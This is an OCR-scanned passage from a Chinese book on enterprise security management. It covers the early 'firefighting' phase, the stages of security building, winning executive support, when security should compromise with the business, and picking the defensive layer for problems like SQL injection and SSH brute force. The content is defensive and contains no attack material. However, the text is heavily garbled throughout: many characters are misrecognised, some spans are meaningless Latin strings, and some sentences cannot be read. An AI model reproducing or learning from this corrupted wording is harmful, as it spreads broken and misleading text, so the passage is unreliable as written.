第 三 张 表 :准确 地 说 应 该 是 第 三 类 ， 包 括 全 网 拓扑 、 各 系统 的 逻 
辑 架 构图、 物理 部 团 图 、 各 系统 间 的 调用 关系 、 服 务 治理 结构 、 数 据 
流 关系 等 ， 这 些 图 未 必 一 开始 就 有 现成 的 ， 促 成 业务 团队 交付 或 者 自 
己 去 调研 都 可 以 ， 以 后 的 日 第 工作 都 需要 这 些 基 础 材料 。 如 果 运 维 有 
资产 管理 也 需要 关注 一 下 。 


2. 历 史 遗 留 问题 


到 了 这 里 你 征 不 是 跃跃欲试 ， 想 马上 建立 完整 的 安全 体系 了 ? fh 
计 有 人 恨不得 马上 拿 扫 摘 凑 去 扫 一 过 了 ， 别 急 ， 残 像 那 首 儿 童 歌 曲 唱 
的 “葡萄 成 熟 还 早 得 很 呐 ! ”， 你 现在 的 角色 还 是 救火 队长 ， 离 建设 还 
早 ， 这 跟 你 的 能 力 和 视野 没关系 ， 这 是 客观 情况 决定 的 ， 一 个 安全 没 
有 大 问题 的 公司 通常 也 不 会 去 找 一 个 安全 人 负 员 人 。 找 安全 负责 人 的 公 
司 意味 着 都 有 一 堆 安 全 问题 叹 待 处 理 。 这 里 就 引申 出 一 个 问题 ,一般 
情况 下 都 是 出 了 比较 产 重 的 安全 问题 才 去 招聘 安全 负责 人 和 建立 专职 
的 安全 团队 的 ， 束 是 说 这 些 系统 曾经 被 渗透 过 ， 或 现在 正在 被 控制 
中 ， 没 有 人 可 以 确定 哪些 是 干净 的 ， 哪 些 是 有 问题 的 ， 而 你 加 入 的 时 
间 点 往往 吏 是 安全 一 片 空 日 还 不 确定 是 不 是 正在 被 人 搞 。 有 人 说 系统 
全 部 重 装 ， 那 你 不 如 直接 跟 老 板 说 全 部 系统 下 线 ， 域 名 注销 ， 天 门 算 
了 ， 那 样子 显然 是 行 不 通 的 ， 所 以 防御 着 不 是 时 时 处 处 都 占 上 风 。 这 
个 问题 只 能 灰 度 处 理 ， 逐 步 建 立 入 侵 检 测 手段 ， 笑 试 发 现 异 凋 行 为 ， 
然后 以 类 似 灰 度 滚动 升级 的 方式 去 做 一 轮 线 上 系统 的 后 门 排查 。 


3. 初 期 三 件 事 


一 开始 的 安全 不 能 全 线 铺 开 ， 而 是 要 集中 做 好 三 件 事 ， 第 一 件 是 
事前 的 安全 基线 ， 不 可 能 永远 做 事后 的 救火 队长 ， 所 以 一 定 要 从 源头 
尽 可 能 保证 你 到 位 后 新 上 线 的 系统 是 安全 的 ; 第 二 件 是 建立 事 中 的 监 
控 的 能 力 ， 各 种 多 维度 的 入 侵 检测 ， 做 到 有 针对 性 的 、 及 时 的 救火 ; 
第 三 件 是 做 好 事后 的 应 急 啊 应 能 力 ， 让 应 急 的 时 间 成 本 更 短 ， 漳 源 和 
根 因 分 析 的 能 力 更 强 。 


一 边 熟 悉 业 务 ， 一 边 当 救火 队长 ， 一 边 敌 建 团队 基本 驳 是 上 任 后 
的 主要 工作 了 。 如 采 团 队 筹 建 得 快 ， 这 个 阶段 2~3 个 月 束 可 以 结束 
T, 但 以 目前 招聘 相对 难 的 状况 来 看 可 能 需要 4~6 个 月 。 


3.2 ”不同 阶段 的 安全 建设 重点 


1. 战 后 重建 


救火 阶段 过 去 之 后 会 进入 正式 的 安全 建设 期 。 第 一 个 阶段 是 基础 
的 安全 建设 ， 这 一 期 主要 做 生产 网 络 和 办 公 网 络 的 网 络 安全 的 基础 部 
分 。 也 就 是 在 前 面 1.4 广 “不 同 规 模 企业 的 安全 管理 ”介绍 的 大 中 型 企业 
对 应 的 那些 需求 (当然 也 包括 中 小 企业 的 那些 。 完 成 的 标志 : 一 方 
面 是 所 提 的 那些 点 全 部 窗 盖 到 了 ， 男 一 方面 是 在 实践 上 不 落后 于 公司 
的 整体 技术 步伐 ， 比 如 运 维 侧 在 用 Puppet、SaltStack 之 类 的 工具 实现 
了 一 定 程 度 的 目 动 化 运 维 ， 那 你 的 安全 措施 也 不 好 意思 是 纯 手工 的 对 
不 对 ， 如 采 产 品 团队 交付 已 经 在 用 持续 集成 了 ， 那 你 是 不 是 也 至 少 提 
供 个 市 点 目 动 化 的 代码 检查 工具 ， 而 不 是 纯 肉 眼 去 Ctrl+F? 这 一 部 分 
其 实 是 很 多 人 眼中 甲 方 安全 的 全 部 内 容 ， 不 过 我 觉得 远 不 能 止 于 此 。 
如 有 果 这 个 场景 切换 到 准 生 态 级 公司 ， 也 许 要 变化 一 下 ， 直 接 同 全 线 工 
具 目 动 化 看 齐 ， 一 开始 整 同步 目 研 必要 的 工具 。 
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现在 安全 相关 的 事情 都 要 抓 起 来 ， 从 只 对 接 内 部 IT， 运 维和 研发 部 门 
扩展 到 全 公司 ， 跟 安全 相关 的 环节 需要 加 入 必要 的 流程 ， 以 前 下 线 的 
硬盘 不 消 磁 的 现在 要 重视 起 来 了 ， 以 前 雇员 可 以 随意 披露 公司 的 信息 
以 后 就 不 可 以 了 ， 以 前 雇员 离职 的 账号 不 回收 的 现在 开始 不 可 能 

以 前 DBA 可 以 给 数据 库 插 条 记录 然后 去 电 商 上 卖 装 备 的 ， 那 种 事 从 此 
开始 要 一 刀 切 断 ， 诸 如 此 类 的 事情 还 有 很 多 。 其 实 这 个 时 候 你 可 以 把 
ISO27001 拿 出 来 看 看 了 。 二 是 业务 安全 ， 比 如 用 户 数据 的 隐私 保护 ， 

之 前 安全 只 是 作为 保障 而 不 是 一 种 前 台 可 见 的 竞争 力 ， 但 现在 安全 需 
要 封装 起 来 对 用 户 可 见 ， 对 产品 竞争 力 负 责 ， 如 果 公 司 已 经 发 展 到 一 
个 很 大 的 平台 ， 盗 号 问题 都 解决 不 了 的 ， 我 觉得 真 的 需要 考虑 一 下 自 
己 的 马 纱 帽 问题 。 这 一 部 分 对 安全 圈 人 士 而 言 可 能 并 不 高 大 上 ， 可 能 
没 太 多 值得 拿 出 来 炫 技 的 部 分 ， 但 是 我 认为 这 些 是 务实 的 安全 负责 人 
需要 考虑 的 问题 ， 这 些 属 于 经 营 管理 者 视角 下 的 一 揽 子 安全 问题 ， 如 
果 这 些 问 题 不 解决 而 去 发 明 WAEF 发 明 HIDS 去 ， 尽 管 可 以 拿 到 安全 圈 来 
发 两 篇 文章 炫耀 一 下 ， 但 从 职责 上 看 属于 本 末 倒 置 ， 直 接 影响 公司 营 
收 的 问题 需要 先 解决 。 之 所 以 把 业务 安全 放 在 第 二 阶段 而 不 是 去 优化 
安全 基础 架构 是 因为 投入 产 出 的 边际 成 本 ， 投 在 业务 安全 上 ， 这 一 部 
分 产 出 会 比较 直观 ， 对 高 层 来 说 安全 从 第 一 阶段 到 第 二 阶段 一 直 是 有 
明显 可 见 的 产 出 ， 而 如 果 此 时 选择 去 优化 基础 安全 能 力 ， 这 种 产 出 受 
边际 成 本 递增 的 影响 ， 效 果 会 极其 不 确定 ， 而 这 时 候 业 务 安 全 问题 频 
发 ， 就 会 被 倒 逼 至 两 难 的 境地 ， 一 则 优化 基础 安全 的 工作 做 了 一 半 ， 


一 则 又 要 考虑 是 否 中 还 转 去 做 点 救火 的 事情 ， 而 安全 产 出 是 安全 团队 
对 公司 高 层 影响 力 的 所 在 ， 只 有 看 到 持续 的 产 出 才 会 影响 力 增 加 ， 才 
会 有 持续 的 投入 ， 尤 其 在 老板 不 是 扩 术 出 身 的 公司 ， 他 也 许 很 难 理解 
你 去 发 明 WAF 的 价值 ， 他 只 会 问 盗 号 这 么 三重 怎么 不 解决 。 这 个 问题 
从 工程 师 的 视角 和 管理 者 的 视角 得 出 的 结论 可 能 完全 不 同 ， 安 全 对 高 
层 的 影响 力 征 安全 团队 在 公司 内 发 展 壮大 的 基础 ， 这 有 十 很 多 甲 方 安全 
团队 之 痛 ， 你 可 以 对 比 一 下 目 己 所 在 的 环境 ， 安 全 团队 的 负责 人 对 大 
方 回 的 把 控 上 是 不 是 做 到 了 可 持续 发 展 ， 好 吧 ， 这 个 问题 有 点 尖锐 。 


3. 优 化 期 


第 三 个 阶段 会 感到 开源 工具 不 足以 文 撑 业 务 规模 ， 进 入 目 研 工具 
时 代 。 其 实 做 攻防 和 研 发 安全 产品 完全 征 两 码 事 ， 人 存在 巨大 的 鸿沟 ， 
如 果 拿 做 攻防 的 团队 直接 去 做 安全 工具 开发 ， 念 怕 挫 折 会 比较 多 ， 即 
便 有 些 研究 员 擅长 做 克 层 的 东西 ， 但 对 于 高 并 发 生产 环境 的 服务 套 工 
具 而 言 ， 还 是 有 很 大 的 门槛 。 男 一 方面 做 攻防 和 做 研发 的 思路 也 截然 
不 同 ， 此 时 其 实 是 在 交付 产品 而 不 是 在 树立 安全 机 制 ， 所 以 要 分 拆 团 
队 ， 另 外 招 人 。 


4. 对 外 开放 


第 四 个 阶段 ， 安 全 能 力 对 外 开放 ， 成 为 乙方 ,不 是 所 有 的 甲 方 安 
全 团队 都 会 经 历 这 个 阶段 ， 故 而 此 处 不 展开 。 不 过 我 想 最 重要 的 区 别 
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竹下 


， 整 体 交 付 ，2B 和 2C 的 区 别 ， 


3.3 QUES RES 


这 是 一 个 在 安全 负责 人 的 面试 中 经 常 被 提 及 的 问题 ， 也 是 在 现实 
生活 中 甲 方 团队 天 天 面 对 的 问题 。 如 果 你 不 是 正巧 在 面试 ， 那 怎么 回 


答 这 个 问题 其 实 不 重要 。 
LAF) EA 


首先 ， 推 动 安全 策略 必须 是 在 组 织 中 自 上 而 下 的 ， 先 跟 高 层 达成 
一 致 ， 形 成 共同 语言 ， 对 安全 建设 要 付出 的 成 本 和 收益 形成 基本 认 
知 ， 这 个 成 本 不 只 是 安全 团队 的 人 力 成 本 和 所 用 的 IDC 资 源 ， 还 包括 
安全 建设 的 管理 成 本 ， 流 程 可 能 会 变 长 ， 发 布 链条 会 比 过 去 更 长 ， 有 
些 产 品 可 能 会 停顿 整改 安全 ， 安 全 特性 的 开发 可 能 会 占用 正常 的 功能 
迭代 周期 ， 程 序 员 可 能 会 站 起 来 说 安全 是 束缚 ， 这 些 都 是 需要 跟 各 产 
品 
能 


线 老大 达成 一 致 的 ， 他 们 要 认同 做 安全 这 件 事 的 价值 ， 你 也 要 尽 可 
的 提供 轻便 的 方法 不 影响 业务 的 速度 。 在 规模 较 大 的 公司 ， 只 有 自 
上 而 下 的 方式 才能 推 得 动 ， 如 采 你 反 其 道行 之 ， 那 我 估计 安全 团队 多 
半 在 公司 是 没有 地 位 的 ， 顶 多 也 就 是 在 微 博 或 者 技术 博客 上 有 些 外 在 
的 影响 力 。 往 下 攻略 去 影响 程序 员 和 SA/DBA 的 难度 肯定 比 往 上 攻略 
影响 CXO/VPs 的 难度 小 ， 但 如 果 一 开始 就 选择 一 条 好 走 的 路 ， 实 际 


对 安全 团队 来 说 是 不 负责 任 的 ， 作 为 团队 领导 你 必须 直面 困难 ， 否 则 
安全 团队 就 只 能 做 些 补 润 、 打 杂 、 救 火 队 长 的 事 。 


2. 战 术 层 面 


在 我 过 去 的 文章 “CSO 的 生存 艺 

术 ”http://bbs.chinaunix.net/forum.php?mod=view-thread&tid=1163970 中 
提 到 一 些 因 势利 导 的 方法 ， 现 在 回头 看 这 些 方法 固然 值得 一 用 ， 但 也 
不 是 最 和 完 应 该 拿 出 来 的 。 很 多 时 候 我 认为 甲 方 安全 团队 思路 受 限 的 地 
方 在 于 : 总 是 把 安全 放 在 研发 和 运 维 的 对 立 面 上 ， 认 为 天 生 束 是 有 冲 
突 的 。 不 信和 回顾 一 下 开会 时 是 不 是 经 常 有 人 对 着 研发 和 运 维 说 “你 们 应 
该 如 何如 何 ..…... 应 该 这 么 做 否则 就 会 被 黑 .…...” 诸 如 此 类 的 都 反映 出 意 
识 形态 中 安全 人 员 觉 得 研发 就 是 脑残 ， 运 维 就 是 傻 义 。 为 什么 我 之 前 
用 了 “合作 ”一 词 ， 其 实 换个 角度 ， 你 真 的 了 解 开发 和 运 维 吗 ， 是 不 是 
找到 个 漏洞 就 心理 高 高 在 上 了 ? 你 是 在 帮助 他 们 解决 问题 ， 还 是 在 指 
使 他 们 听 你 行事 ， 如 采 你 是 产品 研发 的 领 次 人 ， 听 到 下 面 的 程序 员 对 
安全 修改 怨声载道 会 怎么 想 ? 我 的 建议 是 从 现在 开始 不 要 再 用 “你 

们 ”这 个 词 ， 而 改 用 “我 们 *”， 自 此 之 后 便 会 驱动 你 换 位 思考 ， 感 同 刁 
受 ， 真 正成 为 助力 业务 的 伙伴 。 其 实 有 些 问 题 处 理 的 好 ， 真 正 让 人 感 
到 你 提 的 建议 很 专业 ， 研 发 和 运 维和 人 员 不 仅 会 接受 ， 而 且 会 认为 自己 
掌握 了 更 好 的 编码 技能 或 者 安全 配置 技能 而 产生 正 同 的 驱动 力 。 再 通 
俗 一 点 ， 如 果 安 全 跟 人 研发 的 人 际 天 系 是 好 的 ， 提 什么 建议 都 能 接受 ， 


即 如 果 我 认可 你 这 个 人 人， 那么 我 也 认可 你 说 的 事 ; 反之 ， 如 果 人 际 关 
系 不 好 ， 那 不 管 你 所 的 对 不 对 ， 我 惑 是 不 层 意 改 ， 仅 仅 是 迫 于 CTO 的 
压力 不 得 不 改 ， 但 我 心理 还 是 有 怨气 ， 我 还 是 想 在 代码 里 留 个 彩蛋 。 
利用 高 层 的 大 棒 去 驱动 可 能 是 一 种 屡 试 不 严 的 技巧 ， 但 我 认为 不 是 上 
策 。 


安全 策略 的 推动 还 依赖 于 安全 建设 的 有 效 性 ， 如 果 大 家 都 看 到 了 
安 合 略 的 成 效 ， 都 认为 是 有 意义 的 ， 那 么 会 文 持 进 一 步 推动 安全 寅 
KERSANE KARER; 反之 ， 如 有 果 大 家 都 觉得 你 只 不 过 
征 在 玩 些 救火 的 权宜 之 计 ， 心 理 可 能 会 觉得 有 点 疲 务 ， 后 续 目 然 也 不 
会 很 卖力 帮 你 推 ， 因 为 没有 认同 感 。 所 以 安全 的 影响 力 是 不 是 完全 依 
赖 于 高 层 的 重视 ， 我 觉得 有 关系 ， 但 也 跟 目 己 的 表现 有 很 大 的 关系 。 
CTO 肯 定 要 平衡 开发 、 运 维 、 安 全 三 者 的 天 系 ， 不 会 一 直 倾 向 性 为 安 
全 撑腰 ， 而 运 维和 人 研发 的 头 肯 定 都 是 希望 有 一 个 强 有 力 的 做 安全 的 外 
援 。 在 别人 心中 是 不 是 符合 需求 且 值 得 信赖 这 个 只 有 目 己 去 评估 了 。 


至 于 程序 员 或 励 师 ， 我 姑且 认为 那 是 一 种 实施 层面 的 权宜 之 计 ， 
同时 反映 出 安全 行业 比较 缺少 既 收 扩 术 且 情 商 又 高 的 人 。 


3.4 安全 需要 问 业 务 妥 协 吗 


1. 业 界 百 态 


在 安全 行业 5 年 以 下 的 新 人 得 到 的 灌输 基本 都 是 “安全 不 可 或 缺 ”， 
老兵 们 可 能 也 有 点 “看 破 红 侍 ” 的 味道 ， 觉 得 高 层 重 不 重视 安全 也 束 那 
么 回 事 。 对 乙方 来 说 高 声 呼吁 安全 的 重要 性 哪 介 是 强调 的 有 点 过 头 也 
可 以 理解 ， 因 为 是 赖 以 生存 的 利益 相关 者 ， 靠 它 吃饭 ， 影 啊 股 价 。 而 
对 于 甲 方 ， 实 际 上 要 分 儿 种 ， 第 一 类 认为 安全 压倒 一 切 ， 且 心口 一 
致 。 持 有 这 类 想法 的 实际 又 可 以 细 分 为 两 种 人 ， 第 一 种 对 安全 行业 涉 
AMA, DER ERNE, OPAL A a ALS 
DAPAIRCK, REDERE, MAYE TRIA”, PR 
表象 上 看 都 属于 第 一 类 ， 但 本 质 上 不 同 ， 而 第 二 类 人 口头 唱 安 全 重 
要 ， 但 心里 还 是 会 妥协 。 可 见 甲 方 安全 团队 是 形形色色 的 。 


2. 安 全 的 本 质 


撤 开 上 述 业 界 百 态 ， 先 看 安全 管理 的 本 质 是 什么 ?安全 的 本 质 其 
实 是 风险 管理 ， 绝 对 的 安全 可 能 吗 ， 说 绝对 安全 本 喘 殉 是 个 笑话 。 恕 
像 知 名 墨客 袁 哥 说 的 ， 哪 人 是 Fireeye 这 样 的 公司 也 一 样 会 被 APT， 原 
因 古 攻防 不 对 等 ， 防 御 者 要 防御 所 有 的 面 ， 而 攻击 者 只 要 攻破 其 中 一 


个 面 的 一 个 点 就 可 以 了 ， 公 司 几 千 人 的 客户 端 行为 不 是 安全 管理 员 能 
决定 和 预测 的 。 在 所 有 的 面 上 重兵 布防 可 不 可 以 ,理论 上 可 以 , 但 实 
际 绝对 做 不 到 。 接 近 于 绝对 安全 的 系统 是 什么 样 的 ? 尽 可 能 的 不 提供 
服务 ， 提 供 服务 也 只 提供 最 单调 的 数据 交互 模型 ， 尽 可 能 少 的 表现 元 
素 ， 那 样 的 话 还 是 互联 网 吗 ， 还 有 用 户 体验 可 言 吗 ? 而 且 安 全 和 成 本 
永远 要 追求 一 个 平衡 。 假 设 一 个 大 中 型 互联 网 公司 的 安全 建设 成 本 从 
0~60 分 需要 1000 万 ，60~80 分 需要 2000 万 ，80~90 分 需要 5000 万， 
90~95 分 需要 2 亿 ， 这 种 边际 成 本 递增 是 很 多 公司 无 法 承受 的 ， 只 能 追 
求 最 佳 ROI， 虽 然 最 佳 ROI 难 以 衡量 ， 但 绝 大 多 数 人 不 会 拿 出 收入 的 
50% 去 投 安全 建设 。 


3. 受 协 的 原则 


既然 安全 建设 的 本 质 是 以 一 定 的 成 本 追求 最 大 的 安全 防护 效 采 ， 
那 一 定 是 会 有 所 妥协 的 。 于 是 反 过 来 撕 摩 一 下 那些 说 宁可 业务 死 也 要 
做 安全 的 观点 的 初 囊 是 什么 呢 ， 也 许 你 猜 到 了 ， 怕 担 贡 任 ! 因为 业务 
死 了 安全 团队 不 担 责任 ， 他 们 可 以 说 “你 看 安全 不 是 没 出 问题 嘛 ! ”这 
固然 是 一 种 保护 目 己 的 方法 ， 但 是 从 公司 的 角度 看 这 了 束 有 待 商检 了 。 
我 认为 安全 本 质 还 是 为 业务 服务 ， 如 采 业 务 死 了 ， 即 使 安全 做 得 再 好 
也 没 价值 ， 更 准确 一 点 说 ， 安 全 需要 为 业务 量 身 定制 ， 如 采 业 务 要 轻 
法 上 隆 ， 你 给 他 重 甲 也 不 行 ， 只 能 罕 防 弹 背 心 。 安 全 做 得 过 于 重度 都 
古 不 合适 的 。 相 对 而 言 第 二 类 人 拥有 更 加 积极 的 心态 ， 坚 持原 则 又 慌 


得 给 业务 让路 ， 只 是 要 把 握 好 分 寸 ， 避 免 目 己 的 好 心 被 人 利用 ， 成 为 
安全 问题 不 整改 的 免责 窗口 ， 那 样 殴 事与愿违 了 。 


安全 做 得 不 称职 的 表现 ， 除 了 “无 视 业 务 死活 ”， 还 包括 : 用 户 体 
DATTA, Pima PE, 公司 内 部 流程 大 幅 增 加 ， 严 重 影响 工 
作 效 率 ;限制 太 多 员工 满意 度 挛 重 下 降 ， 人 员 流失 ;规章 制度 太 多 ， 
以 至 于 公司 文化 显得 不 近 人 情 .……. 这 些 都 属于 安全 做 过 头 的 表现 。 


有 的 人 出 发 得 太 久 ， 以 至 于 起 了 初 囊 是 什么 。 


那么 哪些 可 以 受 协 ， 哪 些 必须 坚守 呢 ? 高 危 漏 洞 ， 有 了 明显 的 利用 
场景 ， 不 能 妥协 。 重 要 的 安全 特性 ， 比 如 公有 云 中 的 VPC， 确 层 缺 少 
一 个 安全 特性 ， 直 接 会 导致 安全 建设 的 上 层 建筑 失去 了 “地 基 ”， 整 个 
都 不 牢靠 了 ， 这 种 还 是 要 坚持 ， 可 以 不 精致 ， 但 必须 有 。 


对 于 不 痛 不 痒 的 漏洞 ， 以 及 待 开发 的 安全 功能 ， 如 果 开 发 周期 很 
长 ， 受 众 群 体 很 少 ， 使 用 该 功能 的 用 户 比 例 极 少 ， 边 缘 性 产品 ， 只 影 
啊 某 个 中 间 版 本 到 下 个 版 本 被 其 他 机 制 完 全 取代 了 ， 诸 如 此 类 的 情况 
可 以 考虑 酌情 妥协 。 当 然 这 还 会 涉及 男 一 个 话题 在 不 同 的 维度 解决 问 
题 ， 这 个 之 后 再 展开 。 


妥协 并 非 退 让 ， 而 十 大 局 观 ， 试 想 公司 业 务 没有 竞争 力 时 ， 做 安 
全 的 一 样 面临 窘境 ， 无 论 如 何 都 要 看 主 俏 业务 的 脸色 ， 与 其 被 动 跟随 
不 如 快 出 半 个 身 位 。 


最 后 补充 一 点 : 妥协 不 应 该 发 生 在 工程 师 层 面 ， 而 是 应 该 在 
Leader 和 安全 负责 人 这 个 层面 。 如 果 在 安全 工程 师 目 己 提 的 整改 方案 
这 个 层面 上 ， 目 己 主 动 开 始 尼 协 了 ， 那 后 面 很 多 事情 惑 没 法 做 了 。 


3.5” 选 摔 在 不 同 的 维度 伏 防 御 


攻击 的 方法 千 千 万 万 ， 封 堵 同 一 个 安全 风险 的 防御 方法 往往 不 止 
一 种 ， 如 何 选择 性 价 比 最 高 的 手段 是 甲 方 安全 从 业者 需要 权衡 的 。 


1. 技 术 实 现 维度 场景 


在 纵深 防御 的 概念 中 〈 参 考 后 面 的 “技术 篇 ”) 企业 安全 架构 是 层 
层 设防 ， 层 层 过 滤 的 ， 瘦 见 漏 洞 如 琳 要 利用 成 功 需 要 突破 儿 层 限制 ， 
所 以 退 一 步 对 防御 者 而 言 有 选择 在 某 一 层 或 某 几 层 去 设防 和 封 堵 的 便 
利 ， 比 如 SQL 注入 ， 治 本 的 方法 当然 是 代码 写 对 ， 治 标的 方法 WAF 过 
滤 ， 中 间 的 方法 SQL 层 过 滤 ， 从 效果 上 说 治本 的 方法 固然 最 好 ， 但 在 
现实 中 总 归 会 遇 到 各 种 各 样 的 问题 而 无 法 全 部 选择 最 安全 的 解 ， 最 后 
征 退 而 求 其 次 ， 还 是 选择 茶 一 层 或 者 某 儿 层 去 防御 ， 需 要 整体 考虑 。 
比如 SQL 注 入 如 果 在 HTTP 层 面 去 解决 无 论 古 静态 规则 还 是 机 器 学 习 都 
需要 对 抗 HTTP 编 码 的 问题 ， 不 是 解决 这 个 问题 ROI 最 佳 的 点 ， 但 是 在 
SQL 层 面 ， 一 切 SQL 语 句 部 是 真实 的 。 现 实生 活 中 唯一 的 问题 只 是 你 
能 不 能 在 最 佳 的 点 上 推动 解决 方案 。 


一 题 多 解 ” 的 场景 


假如 同一 个 问题 有 >1 种 解决 方案 ， 可 能 会 因 场 景 不 同 而 面临 选 
择 。 比 如 对 于 SSH 蚂 虫 的 暴力 破解 ， 你 可 以 选择 : 1) 使 用 证 书 ;，2) 
选择 外 部 防火 墙 上 关闭 22 端 口 ， 只 通过 堡垒 机 登录 ; 3) 修改 SSHD 监 
听 非 标准 端口 ，4) 修改 sshd 源 代码 对 源 限制 ， 只 接受 可 信 的 客户 端 地 
HE; 5) 使 用 类 似 fail2ban 这 样 的 工具 或 自己 写 shell 脚 本 ， 或 者 所 谓 的 
HIPS 的 功能 。 乍 一 看 有 的 做 法 比较 小 众 ， 有 的 则 属于 偏执 狂 式 的 。 
1) ，2) ，5) 属于 大 多 数 人 都 认同 的 普遍 的 做 法 ，4) 和 5) 看 上 去 都 
比较 小 众 ， 有 的 人 认为 可 能 不 适合 用 作 生 产 网 络 ， 其 实 要 看 场景 。 对 
于 大 型 互联 网 公司 内 部 自用 而 言 : 4) 和 5) 其 实 都 成 立 ， 尽 管 偏离 了 
业界 标准 ， 但 只 要 在 公司 内 部 的 自治 生态 里 做 到 “一 刀 切 ”就 可 以 ， 业 
普 裔 是 SSHD 跑 在 22 端 口 ， 你 可 以 让 公司 内 部 的 都 跑 在 50022 端 口 ， 
只 要 公司 内 部 的 服务 器 全 都 维持 这 个 统一 策略 ， 但 是 这 个 方案 价值 不 
大 的 地 方 在 于 这 种 信息 不 对 称 很 容易 被 打破 ， 你 伦 了 那么 大 力气 让 运 
维 们 都 去 连 50022 端 口 了 ， 但 攻击 方 很 快 承 能 知道 ， 然 后 努力 就 日 费 
了 。 而 对 于 开源 软件 的 修改 ， 如 果 基 础 架构 研发 比较 强大 ，Linux、 
Nginx、SSHD、MySQL 这 些 全 都 可 以 是 改过 的 私房 某 ， 加 点 有 意义 的 
安全 功能 也 未 党 不 可 。 不 过 中 小 型 公司 不 需要 考虑 这 一 点 ， 目 研 毕 竟 
是 有 门槛 和 成 本 的 。 假 如 场景 切换 到 公有 云 给 租户 用 的 环境 ， 这 样 干 
就 不 合适 了 ， 你 还 是 应 该 提供 跟 业 界 兼 容 的 标准 运 维 环境 ， 在 标准 运 
维 环境 之 上 提供 额外 的 保护 。 


3. 跨 时 间 轴 的 场景 


对 于 涉及 跨 时 间 维 度 的 防护 ， 典 型 的 场景 包括 shellshock 这 样 的 汤 
洞 公 布 时 ， 各 三 商 在 第 一 时 间 分 析 漏 洞 评估 影响 ， 这 种 影响 是 多 层面 
的 ,不 只 是 说 可 能 拿 到 什么 权限 ， 还 包括 影响 线 上 系统 的 哪些 组 件 ， 
这 些 组 件 的 实时 在 线 要 求 ， 修 复 漏洞 会 不 会 导致 天 联 服 务 不 可 用 。 每 
一 个 调 洞 修复 的 过 程 都 是 攻防 双方 和 时 间 赛 跑 ， 攻 击 者 尽量 在 上 商 没 
有 修复 之 前 寻找 利用 点 并 发 动 渗透 ， 而 厂商 尽 可 能 在 没 出 POC 时 赶紧 
把 洞 补 了 。 在 这 个 时 间 窗 口中 ， 甲 方 安全 团队 需要 考虑 的 嗣 是 跨 时 间 
维度 上 的 布防 。 出 补丁 之 前 是 不 是 吏 干 等 不 作为 呢 ， 显 然 不 是 的 ， 细 
心 的 人 会 发 现 老牌 安全 公司 的 漏洞 通告 的 解决 方案 里 通 芝 都 会 有 一 
条 ， 叫 作 “I 临 时 规避 措施 ”， 经 验 不 足 的 团队 是 不 会 写 上 这 条 的 。 修 不 
了 漏洞 时 可 以 采用 一 些 治 标的 补救 性 措施 ， 比 如 对 有 漏洞 的 页 面 做 访 
问 控制 ， 只 允许 有 限 的 src.ip 访 问 ， 比 如 在 前 端的 WAF/IPS 设 备 上 加 规 
则 过 着 对 应 的 恶意 请 求 ， 或 者 临时 性 的 去 掉 一 些 权 限 ， 或 者 干脆 关 掉 
某 些 功能 ， 但 凡 你 想得到 的 通常 总 能 找到 临时 规避 方案 ， 即 便 是 有 了 
补丁 升级 也 不 是 立即 完成 的 ， 在 大 型 互联 网 生产 网 络 里 ， 全 网 打 完 一 
个 补丁 是 需要 不 少时 间 的 ， 有 可 能 一 个 礼拜 都 弄 不 完 ， 而 且 修 复 过 程 
中 要 考虑 服务 可 用 性 需要 使 用 灰 度 和 深 动 升级 的 方法 ， 比 如 修复 前 移 
把 负载 均衡 上 的 流量 切换 到 备用 节点 ， 然 后 对 举世 点 的 服务 万 打 补 
丁 ， 打 完 再 把 流量 切 回 去 ， 然 后 对 备用 节点 的 服务 器 打 补 丁 .……... 打 完 
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议 留 太 多 腾 肿 的 规则 ) ， 然 后 把 特征 加 入 全 流量 和 主机 IDS。 回 顾 整 
个 时 间 轴 的 防护 措施 依次 是 : 临时 性 规避 措施 一 push 补 本 /根治 措施 一 
取 请 临时 性 措施 一 添加 音 态 性 的 特征 检测 措施 一 检测 到 漏网 之 鱼 一 继 
续 上 述 过 程 ， 这 个 过 程 离 最 佳 实践 实际 上 还 差 了 一 个 环 条 ， 不 过 这 里 
只 是 用 来 说 明 开 头 提 到 的 那个 问题 故而 不 展开 了 ， 后 面 会 介绍 对 于 一 
个 漏洞 修复 是 否 需要 上 升 层次 的 问题 。 


4. 风 险 和 影响 的 平衡 


假如 你 遇 到 一 个 安全 问题 是 这 样 的 : vlan 数目 不 够 ，vxlan 又 不 可 
用 ， 提 交 问 题 后 研发 的 反馈 的 方案 A 是 如 果 要 彻底 修复 则 需要 新 增 一 
个 dhcpd 的 安全 功能 大 约 包 含 10000 (loc) 即 1 万 行 代码 ， 此 时 产品 线 
又 处 于 整体 加 班 加 点 赶 工大 版 本 的 状态 ， 有 人 提出 了 方案 B 做 IP/MAC 
双向 绑 定 的 绥 解 性 措施 ， 但 这 样 的 结果 很 可 能 是 客户 觉得 太 麻 烦 ， 而 
且 配 置 一 多 容易 出 钳 ， 此 时 你 想到 了 一 个 折 中 的 办 法 方案 C: 给 大 客 
户 单独 vlan， 若 干 小 客户 共享 一 个 vlan， 这 样 的 好 处 是 不 需要 太 多 成 
本 ， 风 险 降低 到 可 控 ， 客 户 可 以 接受 。 如 果 选 择 方案 A 是 不 是 更 好 ? 
这 个 要 看 ， 假 如 这 1 万 行 代码 只 是 用 来 临时 的 解决 这 个 问题 ， 显 然 ROI 
比较 低 ， 但 是 如 果 后 续 的 版 本 本 来 就 要 加 入 这 个 功能 ， 不 妨 考 虚 一 
下 。 又 如 果 后 续 版 本 不 需要 这 个 小 众 的 功能 ， 人 研发 心里 其 实 本 不 打算 
去 开发 的 ， 说 不 定 下 次 告诉 你 说 要 2 万 行 代码 ， 然 后 你 到 CTO 那 里 也 说 
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者 之 间 做 最 大 平衡 : 1) 风险 又 露 程度 ，2) 研发 运 维 变更 成 本 ; 3) 用 
尸体 验 的 负面 影响 。 


5. 修 复 成 本 的 折 中 


一 个 安全 漏洞 的 修复 如 果 俩 发 说 要 开发 一 周 ， 夯 外 一 个 方案 是 运 
维 改 一 个 服务 器 配置 ， 而 你 其 实心 里 知道 在 WAF 上 加 条 规则 就 能 过 
滤 ， 只 不 过 你 怕 被 绕 过 心里 对 这 个 措施 不 是 特别 有 底气 。 对 于 这 个 场 
景 我 也 不 打算 直接 给 出 答案 ， 但 通常 情况 下 改 产 品 的 成 本 是 最 高 的 ， 
成 本 最 高 的 往往 不 容易 推动 ， 推 不 动 就 无 法 落地 ， 最 后 承 是 一 堆 安全 


问题 。 


Amazon 有 一 个 研发 理论 ， 用 一 种 T-Shirt Size 估 计 的 方式 来 做 项 
